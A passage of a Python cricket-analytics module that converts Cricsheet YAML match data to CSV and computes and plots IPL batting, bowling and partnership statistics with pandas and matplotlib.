df['ManOfMatch']=a['info']['player_of_match'][0]
except:
df['ManOfMatch']=0
# Identify the winner
df['overs']=a['info']['overs']
df['team1']=a['info']['teams'][0]
df['team2']=a['info']['teams'][1]
df['tossWinner']=a['info']['toss']['winner']
df['tossDecision']=a['info']['toss']['decision']
df['venue']=a['info']['venue']
# Rename column 'striker' to batsman
# Rename column 'batsman' to runs as it signifies runs scored by batsman
df=df.rename(columns={'batsman':'runs'})
df=df.rename(columns={'striker':'batsman'})
if (type(a['info']['dates'][0]) == str):
outfile=a['info']['teams'][0]+ '-' + a['info']['teams'][1] + '-' +a['info']['dates'][0] + '.csv'
else:
outfile=a['info']['teams'][0]+ '-' + a['info']['teams'][1] + '-' +a['info']['dates'][0].strftime('%Y-%m-%d') + '.csv'
destFile=os.path.join(dest,outfile)
print(destFile)
df.to_csv(destFile,index=False)
print("Dataframe shape=",df.shape)
return df, outfile
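# A brief usage note (added; not part of the original source): the function
# returns both the dataframe and the saved file name, so the CSV can be read
# back directly, e.g.
#
#   df, fname = convertYaml2PandasDataframeT20("225171.yaml", ".", "../data")
#   saved = pd.read_csv(os.path.join("../data", fname))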
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: convertAllYaml2PandasDataframesT20
# This function converts all yaml files to Pandas dataframes and saves as CSV
#
###########################################################################################
def convertAllYaml2PandasDataframesT20(source,dest):
'''
    Convert all Yaml files to pandas dataframes and save them as CSV
Description
This function coverts all Yaml files from source directory to data frames. The data frames are
then stored as .csv. The saved files are of the format team1-team2-date.RData For
e.g. England-India-2008-04-06.RData etc
Usage
convertAllYaml2PandasDataframesT20(sourceDir=".",targetDir=".")
Arguments
sourceDir
The source directory of the yaml files
targetDir
    The target directory in which the data frames are stored as CSV files
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
    convertYaml2PandasDataframeT20
Examples
# In the example below ../yamldir is the source dir for the yaml files
convertAllYaml2PandasDataframesT20("../yamldir","../data")
'''
files = os.listdir(source)
for index, file in enumerate(files):
print("\n\nFile no=",index)
if file.endswith(".yaml"):
df, filename = convertYaml2PandasDataframeT20(file, source, dest)
#print(filename)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getRuns
# This function gets the runs scored by batsmen
#
###########################################################################################
def getRuns(df):
df1=df[['batsman','runs','extras','total','non_boundary']]
# Determine number of deliveries faced and runs scored
runs=df1[['batsman','runs']].groupby(['batsman'],sort=False,as_index=False).agg(['count','sum'])
# Drop level 0
runs.columns = runs.columns.droplevel(0)
runs=runs.reset_index(inplace=False)
runs.columns=['batsman','balls','runs']
return(runs)
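# A tiny worked example (added; not part of the original source) of what
# getRuns computes, using a hypothetical three-delivery innings:
#
#   df = pd.DataFrame({'batsman': ['A', 'A', 'B'], 'runs': [4, 1, 6],
#                      'extras': [0, 0, 0], 'total': [4, 1, 6],
#                      'non_boundary': [0, 0, 0]})
#   getRuns(df)   # -> A: 2 balls, 5 runs; B: 1 ball, 6 runs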
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getFours
# This function gets the fours scored by batsmen
#
###########################################################################################
def getFours(df):
df1=df[['batsman','runs','extras','total','non_boundary']]
# Get number of 4s. Check if it is boundary (non_boundary=0)
m=df1.loc[(df1.runs >=4) & (df1.runs <6) & (df1.non_boundary==0)]
# Count the number of 4s
noFours= m[['batsman','runs']].groupby('batsman',sort=False,as_index=False).count()
noFours.columns=['batsman','4s']
return(noFours)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getSixes
# This function gets the sixes scored by batsmen
#
###########################################################################################
def getSixes(df):
df1=df[['batsman','runs','extras','total','non_boundary']]
df2= df1.loc[(df1.runs ==6)]
sixes= df2[['batsman','runs']].groupby('batsman',sort=False,as_index=False).count()
sixes.columns=['batsman','6s']
return(sixes)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getExtras
# This function gets the extras for the team
#
###########################################################################################
def getExtras(df):
df3= df[['total','wides', 'noballs', 'legbyes', 'byes', 'penalty', 'extras']]
a=df3.sum().astype(int)
#Convert series to dataframe
extras=a.to_frame().T
return(extras)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBattingScorecardMatch
# This function returns the team batting scorecard
#
###########################################################################################
def teamBattingScorecardMatch (match,theTeam):
'''
Team batting scorecard of a team in a match
Description
    This function computes and returns the batting scorecard (runs, fours, sixes, balls played) for the team
Usage
teamBattingScorecardMatch(match,theTeam)
Arguments
match
    The match for which the score card is required
theTeam
Team for which scorecard required
Value
scorecard A data frame with the batting scorecard
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBatsmenPartnershipMatch
teamBowlingScorecardMatch
teamBatsmenVsBowlersMatch
Examples
x1,y1=teamBattingScorecardMatch(kkr_sh,"Sunrisers Hyderabad")
print(x1)
print(y1)
'''
scorecard=pd.DataFrame()
if(match.size != 0):
team=match.loc[match['team'] == theTeam]
else:
return(scorecard,-1)
a1= getRuns(team)
b1= getFours(team)
c1= getSixes(team)
# Merge columns
d1=pd.merge(a1, b1, how='outer', on='batsman')
e=pd.merge(d1,c1,how='outer', on='batsman')
e=e.fillna(0)
e['4s']=e['4s'].astype(int)
e['6s']=e['6s'].astype(int)
e['SR']=(e['runs']/e['balls']) *100
scorecard = e[['batsman','runs','balls','4s','6s','SR']]
extras=getExtras(match)
return(scorecard,extras)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getRunsConceded
# This function gets the runs conceded by bowler
#
###########################################################################################
def getRunsConceded(df):
# Note the column batsman has the runs scored by batsman
df1=df[['bowler','runs','wides', 'noballs']]
df2=df1.groupby('bowler').sum()
# Only wides and no balls included in runs conceded
df2['runs']=(df2['runs']+df2['wides']+df2['noballs']).astype(int)
df3 = df2['runs']
return(df3)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getOvers
# This function gets the overs for bowlers
#
###########################################################################################
def getOvers(df):
df1=df[['bowler','delivery']]
df2=(df1.groupby('bowler').count()/6).astype(int)
df2.columns=['overs']
return(df2)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getMaidens
# This function gets the maiden overs for bowlers
#
###########################################################################################
def getMaidens(df):
df1=df[['bowler','delivery','runs','wides', 'noballs']]
# Get the over
df1['over']=df1.delivery.astype(int)
# Runs conceded includes wides and noballs
df1['runsConceded']=df1['runs'] + df1['wides'] + df1['noballs']
df2=df1[['bowler','over','runsConceded']]
# Compute runs in each over by bowler
df3=df2.groupby(['bowler','over']).sum()
df4=df3.reset_index(inplace=False)
# If maiden set as 1 else as 0
df4.loc[df4.runsConceded !=0,'maiden']=0
df4.loc[df4.runsConceded ==0,'maiden']=1
    # Sum the maidens
df5=df4[['bowler','maiden']].groupby('bowler').sum()
return(df5)
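# A minimal sketch of the maiden-over logic above, on a hypothetical toy frame
# (bowler X concedes 0 runs off 6 legal balls in over 1, so maiden == 1):
#   toy = pd.DataFrame({'bowler': ['X']*6,
#                       'delivery': [1.1, 1.2, 1.3, 1.4, 1.5, 1.6],
#                       'runs': [0]*6, 'wides': [0]*6, 'noballs': [0]*6})
#   getMaidens(toy)   # -> maiden count of 1 for bowler X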
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getWickets
# This function gets the wickets for bowlers
#
###########################################################################################
def getWickets(df):
df1=df[['bowler','kind', 'player_out', 'fielders']]
    # If the team took wickets this column will contain strings
if isinstance(df1.player_out.iloc[0],str):
df2= df1[df1.player_out !='0']
df3 = df2[['bowler','player_out']].groupby('bowler').count()
else: # Did not take wickets. Set wickets as 0
df3 = df1[['bowler','player_out']].groupby('bowler').count()
        df3['player_out']=0 # Set wickets to 0
return(df3)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBowlingScorecardMatch
# This function gets the bowling scorecard
#
###########################################################################################
def teamBowlingScorecardMatch (match,theTeam):
'''
Compute and return the bowling scorecard of a team in a match
Description
This function computes and returns the bowling scorecard of a team in a match
Usage
teamBowlingScorecardMatch(match,theTeam)
Arguments
match
The match between the teams
theTeam
Team for which bowling performance is required
Value
    A data frame with the bowling scorecard of the team in the match
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingWicketMatch
teamBowlersVsBatsmenMatch
teamBattingScorecardMatch
Examples
m=teamBowlingScorecardMatch(kkr_sh,"Sunrisers Hyderabad")
print(m)
'''
team=match.loc[match.team== theTeam]
# Compute overs bowled
a1= getOvers(team).reset_index(inplace=False)
# Compute runs conceded
b1= getRunsConceded(team).reset_index(inplace=False)
# Compute maidens
c1= getMaidens(team).reset_index(inplace=False)
# Compute wickets
d1= getWickets(team).reset_index(inplace=False)
e1=pd.merge(a1, b1, how='outer', on='bowler')
f1= pd.merge(e1,c1,how='outer', on='bowler')
g1= pd.merge(f1,d1,how='outer', on='bowler')
g1 = g1.fillna(0)
# Compute economy rate
g1['econrate'] = g1['runs']/g1['overs']
g1.columns=['bowler','overs','runs','maidens','wicket','econrate']
g1.maidens = g1.maidens.astype(int)
g1.wicket = g1.wicket.astype(int)
return(g1)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBatsmenPartnershipMatch
# This function gets the batting partnerships
#
###########################################################################################
def teamBatsmenPartnershipMatch(match,theTeam,opposition,plot=True,savePic=False, dir1=".",picFile="pic1.png"):
'''
Team batting partnerships of batsmen in a match
Description
This function plots the partnerships of batsmen in a match against an opposition or it can return the data frame
Usage
    teamBatsmenPartnershipMatch(match,theTeam,opposition,plot=True)
    Arguments
    match
    The match between the teams
    theTeam
    The team for which the batting partnerships are sought
    opposition
    The opposition team
    plot
    If plot=True then a plot is created otherwise a data frame is returned
    savePic
    If savePic = True then the plot is saved
    dir1
    The directory where the plot is saved
    picFile
    The name of the savefile
    Value
    df The data frame of the batsmen partnerships
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBattingScorecardMatch
teamBowlingWicketKindMatch
teamBatsmenVsBowlersMatch
matchWormChart
Examples
teamBatsmenPartnershipMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=True)
m=teamBatsmenPartnershipMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=False)
print(m)
'''
df1=match.loc[match.team== theTeam]
df2= df1[['batsman','runs','non_striker']]
if plot == True:
df3=df2.groupby(['batsman','non_striker']).sum().unstack().fillna(0)
rcParams['figure.figsize'] = 10, 6
df3.plot(kind='bar',stacked=True)
plt.xlabel('Batsman')
plt.ylabel('Runs')
plt.title(theTeam + ' -batting partnership- vs ' + opposition)
plt.text(4, 30,'Data source-Courtesy:http://cricsheet.org',
horizontalalignment='center',
verticalalignment='center',
)
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
df3=df2.groupby(['batsman','non_striker']).sum().reset_index(inplace=False)
return(df3)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBatsmenVsBowlersMatch
# This function gives the performances of batsmen vs bowlers
#
###########################################################################################
def teamBatsmenVsBowlersMatch(match,theTeam,opposition, plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Team batsmen against bowlers in a match
Description
This function plots the performance of batsmen versus bowlers in a match or it can return the data frame
Usage
    teamBatsmenVsBowlersMatch(match,theTeam,opposition,plot=True)
    Arguments
    match
    The match between the teams
    theTeam
    The team for which the batting performance is sought
    opposition
    The opposition team
    plot
    If plot=True then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
b The data frame of the batsmen vs bowlers performance
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingWicketKindMatch
teamBowlingWicketMatch
Examples
teamBatsmenVsBowlersMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=True)
'''
df1=match.loc[match.team== theTeam]
df2= df1[['batsman','runs','bowler']]
if plot == True:
df3=df2.groupby(['batsman','bowler']).sum().unstack().fillna(0)
df3.plot(kind='bar',stacked=True)
rcParams['figure.figsize'] = 10, 6
plt.xlabel('Batsman')
plt.ylabel('Runs')
plt.title(theTeam + ' -Batsman vs Bowler- in match against ' + opposition)
plt.text(4, 30,'Data source-Courtesy:http://cricsheet.org',
horizontalalignment='center',
verticalalignment='center',
)
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
df3=df2.groupby(['batsman','bowler']).sum().reset_index(inplace=False)
return(df3)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBowlingWicketKindMatch
# This function gives the wicket kind for bowlers
#
###########################################################################################
def teamBowlingWicketKindMatch(match,theTeam,opposition, plot=True,savePic=False, dir1=".",picFile="pic1.png"):
'''
Compute and plot the wicket kinds by bowlers in match
Description
    This function computes and returns the kind of wickets (caught, bowled etc) taken by bowlers in a match between 2 teams
    Usage
    teamBowlingWicketKindMatch(match,theTeam,opposition,plot=True)
    Arguments
    match
    The match between the teams
    theTeam
    Team for which bowling performance is required
    opposition
    The opposition team
    plot
    If plot=True the data frame is plotted else the data frame is returned
    savePic
    If savePic = True then the plot is saved
    dir1
    The directory where the plot is saved
    picFile
    The name of the savefile
    Value
    None or a data frame of the wicket kinds taken by each bowler
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingWicketMatch
teamBowlingWicketRunsMatch
teamBowlersVsBatsmenMatch
Examples
teamBowlingWicketKindMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=True)
m=teamBowlingWicketKindMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=False)
print(m)
'''
df1=match.loc[match.team== theTeam]
df2= df1[['bowler','kind','player_out']]
# Find all rows where there was a wicket
df3=df2[df2.player_out != '0']
if plot == True:
# Find the different types of wickets for each bowler
df4=df3.groupby(['bowler','kind']).count().unstack().fillna(0)
df4.plot(kind='bar',stacked=True)
rcParams['figure.figsize'] = 10, 6
        plt.xlabel('Bowler')
        plt.ylabel('Wickets')
plt.title(theTeam + ' -Wicketkind vs Runs- given against ' + opposition)
plt.text(4, 30,'Data source-Courtesy:http://cricsheet.org',
horizontalalignment='center',
verticalalignment='center',
)
if(savePic):
plt.savefig(os.path.join(dir1,picFile))
else:
plt.show()
plt.gcf().clear()
else:
# Find the different types of wickets for each bowler
df4=df3.groupby(['bowler','kind']).count().reset_index(inplace=False)
return(df4)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBowlingWicketMatch
# This function gives the wickets for bowlers
#
###########################################################################################
def teamBowlingWicketMatch(match,theTeam,opposition, plot=True,savePic=False, dir1=".",picFile="pic1.png"):
'''
Compute and plot wickets by bowlers in match
Description
    This function computes and returns the wickets taken by bowlers in a match between 2 teams
    Usage
    teamBowlingWicketMatch(match,theTeam,opposition,plot=True)
    Arguments
    match
    The match between the teams
    theTeam
    Team for which bowling performance is required
    opposition
    The opposition team
    plot
    If plot=True the data frame is plotted else the data frame is returned
    savePic
    If savePic = True then the plot is saved
    dir1
    The directory where the plot is saved
    picFile
    The name of the savefile
    Value
    None or a data frame of the wickets taken by each bowler
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingWicketMatch
teamBowlingWicketRunsMatch
teamBowlersVsBatsmenMatch
Examples
teamBowlingWicketMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=True)
'''
df1=match.loc[match.team== theTeam]
df2= df1[['bowler','kind','player_out']]
# Find all rows where there was a wicket
df3=df2[df2.player_out != '0']
if plot == True:
# Find the different types of wickets for each bowler
df4=df3.groupby(['bowler','player_out']).count().unstack().fillna(0)
df4.plot(kind='bar',stacked=True)
rcParams['figure.figsize'] = 10, 6
        plt.xlabel('Bowler')
        plt.ylabel('Wickets')
plt.title(theTeam + ' -No of Wickets vs Runs conceded- against ' + opposition)
plt.text(1, 1,'Data source-Courtesy:http://cricsheet.org',
horizontalalignment='center',
verticalalignment='center',
)
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
# Find the different types of wickets for each bowler
df4=df3.groupby(['bowler','player_out']).count().reset_index(inplace=False)
return(df4)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBowlersVsBatsmenMatch
# This function gives the bowlers vs batsmen and runs conceded
#
###########################################################################################
def teamBowlersVsBatsmenMatch (match,theTeam,opposition, plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Team bowlers vs batsmen in a match
Description
This function computes performance of bowlers of a team against an opposition in a match
Usage
    teamBowlersVsBatsmenMatch(match,theTeam,opposition,plot=True)
    Arguments
    match
    The data frame of the match. This can be obtained with a call such as a = getMatchDetails("England","Pakistan","2006-09-05",dir="../temp")
    theTeam
    The team against which the performance is required
    opposition
    The opposition team
    plot
    This parameter specifies if a plot is required. If plot=False then a data frame is returned
    savePic
    If savePic = True then the plot is saved
    dir1
    The directory where the plot is saved
    picFile
    The name of the savefile
    Value
    None or dataframe If plot=True there is no return value. If plot=False then the dataframe is returned
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBattingScorecardMatch
teamBowlingWicketKindMatch
matchWormChart
Examples
teamBowlersVsBatsmenMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=True)
'''
df1=match.loc[match.team== theTeam]
df2= df1[['batsman','runs','bowler']]
if plot == True:
df3=df2.groupby(['batsman','bowler']).sum().unstack().fillna(0)
df3.plot(kind='bar',stacked=True)
rcParams['figure.figsize'] = 10, 6
plt.xlabel('Batsman')
plt.ylabel('Runs')
plt.title(theTeam + ' -Bowler vs Batsman- against ' + opposition)
plt.text(4, 20,'Data source-Courtesy:http://cricsheet.org',
horizontalalignment='center',
verticalalignment='center',
)
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
df3=df2.groupby(['batsman','bowler']).sum().reset_index(inplace=False)
return(df3)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: matchWormChart
# This function draws the match worm chart
#
###########################################################################################
def matchWormChart(match,team1,team2,plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Plot the match worm graph
Description
This function plots the match worm graph between 2 teams in a match
Usage
    matchWormChart(match,team1,team2)
Arguments
match
The dataframe of the match
team1
The 1st team of the match
team2
the 2nd team in the match
plot
    If plot=True then the worm chart is displayed (or saved if savePic=True)
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
none
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBatsmenVsBowlersMatch
teamBowlingWicketKindMatch
Examples
## Not run:
#Get the match details
    a = getMatchDetails("England","Pakistan","2006-09-05",dir="../temp")
    # Plot the match worm chart
    matchWormChart(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad")
'''
df1=match.loc[match.team==team1]
df2=match.loc[match.team==team2]
df3=df1[['delivery','total']]
df3['cumsum']=df3.total.cumsum()
df4 = df2[['delivery','total']]
df4['cumsum'] = df4.total.cumsum()
df31 = df3[['delivery','cumsum']]
df41 = df4[['delivery','cumsum']]
#plt.plot(df3.delivery.values,df3.cumsum.values)
df51= pd.merge(df31,df41,how='outer', on='delivery').dropna()
df52=df51.set_index('delivery')
df52.columns = [team1,team2]
df52.plot()
rcParams['figure.figsize'] = 10, 6
plt.xlabel('Delivery')
plt.ylabel('Runs')
plt.title('Match worm chart ' + team1 + ' vs ' + team2)
plt.text(10, 10,'Data source-Courtesy:http://cricsheet.org',
horizontalalignment='center',
verticalalignment='center',
)
if plot == True:
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: getAllMatchesBetweenTeams
# This function gets all the matches between 2 IPL teams
#
###########################################################################################
def getAllMatchesBetweenTeams(team1,team2,dir=".",save=False,odir="."):
'''
Get data on all matches between 2 opposing teams
Description
    This function gets all the data on matches between opposing IPL teams. This can be saved
    by the user and used in functions in which analyses are done for all matches
    between these teams.
    Usage
    getAllMatchesBetweenTeams(team1,team2,dir=".",save=False)
    Arguments
    team1
    One of the teams in consideration e.g. (KKR, CSK etc)
    team2
    The other team for which matches are needed e.g. (MI, GL)
    dir
    The directory which has the CSV files of matches between teams
    save
    Default=False. This parameter indicates whether the combined data frame
    needs to be saved or not. It is recommended to save this large dataframe as
    the creation of this data frame takes several seconds depending on the number of matches
Value
matches - The combined data frame
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
plotWinsbyTossDecision
teamBowlersVsBatsmenOppnAllMatches
'''
# Create the 2 combinations
t1 = team1 +'-' + team2 + '*.csv'
t2 = team2 + '-' + team1 + '*.csv'
path1= os.path.join(dir,t1)
path2 = os.path.join(dir,t2)
files = glob.glob(path1) + glob.glob(path2)
print(len(files))
# Save as CSV only if there are matches between the 2 teams
if len(files) !=0:
df = pd.DataFrame()
for file in files:
df1 = pd.read_csv(file)
df=pd.concat([df,df1])
if save==True:
dest= team1 +'-' + team2 + '-allMatches.csv'
output=os.path.join(odir,dest)
df.to_csv(output)
else:
return(df)
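# A hedged usage sketch for getAllMatchesBetweenTeams. It assumes the per-match
# CSV files were created earlier (e.g. with convertYaml2PandasDataframeT20) and
# the directory path below is hypothetical:
#   kkr_csk = getAllMatchesBetweenTeams("Kolkata Knight Riders",
#                                       "Chennai Super Kings", dir="../data")
#   print(kkr_csk.shape)   # combined ball-by-ball rows of all KKR-CSK matches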
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: saveAllMatchesBetween2IPLTeams
# This function saves all the matches between allIPL teams
#
###########################################################################################
def saveAllMatchesBetween2IPLTeams(dir1,odir="."):
'''
Saves all matches between 2 IPL teams as dataframe
Description
    This function saves all matches between every pair of IPL teams as a single
    dataframe each, in the specified output directory
    Usage
    saveAllMatchesBetween2IPLTeams(dir1,odir=".")
    Arguments
    dir1
    Directory which has the CSV files of individual matches
    odir
    Directory in which the combined match data frames are saved
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenVsBowlersOppnAllMatches
'''
teams = ["Chennai Super Kings","Deccan Chargers","Delhi Daredevils",
"Kings XI Punjab", 'Kochi Tuskers Kerala',"Kolkata Knight Riders",
"Mumbai Indians", "Pune Warriors","Rajasthan Royals",
"Royal Challengers Bangalore","Sunrisers Hyderabad","Gujarat Lions",
"Rising Pune Supergiants"]
for team1 in teams:
for team2 in teams:
if team1 != team2:
print("Team1=",team1,"team2=", team2)
getAllMatchesBetweenTeams(team1,team2,dir=dir1,save=True,odir=odir)
time.sleep(2) #Sleep before next save
return
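# A hedged usage sketch; dir1 is assumed to hold the individual match CSV files
# and the combined files are written to odir (both paths hypothetical):
#   saveAllMatchesBetween2IPLTeams(dir1="../data", odir="../matchData")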
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBatsmenPartnershiOppnAllMatches
# This function gets the partnetships for a team in all matches
#
###########################################################################################
def teamBatsmenPartnershiOppnAllMatches(matches,theTeam,report="summary",top=5):
'''
    Team batting partnership against an opposition in all IPL matches
    Description
    This function computes the performance of batsmen against all bowlers of an opposition in
    all matches. This function returns a dataframe
Usage
teamBatsmenPartnershiOppnAllMatches(matches,theTeam,report="summary")
Arguments
matches
All the matches of the team against the oppositions
theTeam
    The team for which the batting partnerships are sought
report
If the report="summary" then the list of top batsmen with the highest partnerships
is displayed. If report="detailed" then the detailed break up of partnership is returned
as a dataframe
top
The number of players to be displayed from the top
Value
partnerships The data frame of the partnerships
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBatsmenVsBowlersOppnAllMatchesPlot
teamBatsmenPartnershipOppnAllMatchesChart
'''
df1 = matches[matches.team == theTeam]
df2 = df1[['batsman','non_striker','runs']]
# Compute partnerships
df3=df2.groupby(['batsman','non_striker']).sum().reset_index(inplace=False)
df3.columns = ['batsman','non_striker','partnershipRuns']
# Compute total partnerships
df4 = df3.groupby('batsman').sum().reset_index(inplace=False).sort_values('partnershipRuns',ascending=False)
df4.columns = ['batsman','totalPartnershipRuns']
# Select top 5
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='batsman')
if report == 'summary':
return(df5)
elif report == 'detailed':
return(df6)
else:
print("Invalid option")
return
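# A hedged usage sketch, assuming kkr_csk was built with getAllMatchesBetweenTeams
# as shown above:
#   top5 = teamBatsmenPartnershiOppnAllMatches(kkr_csk, "Kolkata Knight Riders",
#                                              report="summary", top=5)
#   details = teamBatsmenPartnershiOppnAllMatches(kkr_csk, "Kolkata Knight Riders",
#                                                 report="detailed")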
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBatsmenPartnershipOppnAllMatchesChart
# This function plots the partnetships for a team in all matches
#
###########################################################################################
def teamBatsmenPartnershipOppnAllMatchesChart(matches,main,opposition,plot=True,top=5,partnershipRuns=20,savePic=False, dir1=".",picFile="pic1.png"):
'''
    Plot of team partnership in all IPL matches against an opposition
    Description
    This function plots the batting partnerships of a team against an opposition in all
    matches. This function also returns a dataframe with the batting partnerships
    Usage
    teamBatsmenPartnershipOppnAllMatchesChart(matches,main,opposition,plot=True,top=5,partnershipRuns=20)
    Arguments
    matches
    All the matches of the team against the opposition
    main
    The main team for which the batting partnerships are sought
    opposition
    The opposition team for which the batting partnerships are sought
    plot
    Whether the partnerships have to be rendered as a plot. If plot=False the data frame is returned
top
The number of players from the top to be included in chart
partnershipRuns
The minimum number of partnership runs to include for the chart
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None or partnerships
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
    teamBatsmenPartnershiOppnAllMatches
saveAllMatchesBetween2IPLTeams
teamBatsmenVsBowlersAllOppnAllMatchesPlot
teamBatsmenVsBowlersOppnAllMatches
'''
df1 = matches[matches.team == main]
df2 = df1[['batsman','non_striker','runs']]
# Compute partnerships
df3=df2.groupby(['batsman','non_striker']).sum().reset_index(inplace=False)
df3.columns = ['batsman','non_striker','partnershipRuns']
# Compute total partnerships
df4 = df3.groupby('batsman').sum().reset_index(inplace=False).sort_values('partnershipRuns',ascending=False)
df4.columns = ['batsman','totalPartnershipRuns']
# Select top 5
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='batsman')
df7 = df6[['batsman','non_striker','partnershipRuns']]
    # Keep only partnerships above the partnershipRuns cutoff, else there are too many rows
df8 = df7[df7['partnershipRuns'] > partnershipRuns]
df9=df8.groupby(['batsman','non_striker'])['partnershipRuns'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df8=df7.pivot(columns='non_striker',index='batsman').fillna(0)
if plot == True:
df9.plot(kind='bar',stacked=True,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
plt.title('Partnership runs between ' + main + '-' + opposition)
plt.xlabel('Batsman')
plt.ylabel('Partnership runs')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
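# A hedged usage sketch, assuming kkr_csk as above:
#   teamBatsmenPartnershipOppnAllMatchesChart(kkr_csk, "Kolkata Knight Riders",
#       "Chennai Super Kings", plot=True, top=5, partnershipRuns=20)
#   partnerships = teamBatsmenPartnershipOppnAllMatchesChart(kkr_csk,
#       "Kolkata Knight Riders", "Chennai Super Kings", plot=False)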
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBatsmenVsBowlersOppnAllMatches
# This function plots the performance of batsmen against bowlers
#
###########################################################################################
def teamBatsmenVsBowlersOppnAllMatches(matches,main,opposition,plot=True,top=5,runsScored=20,savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
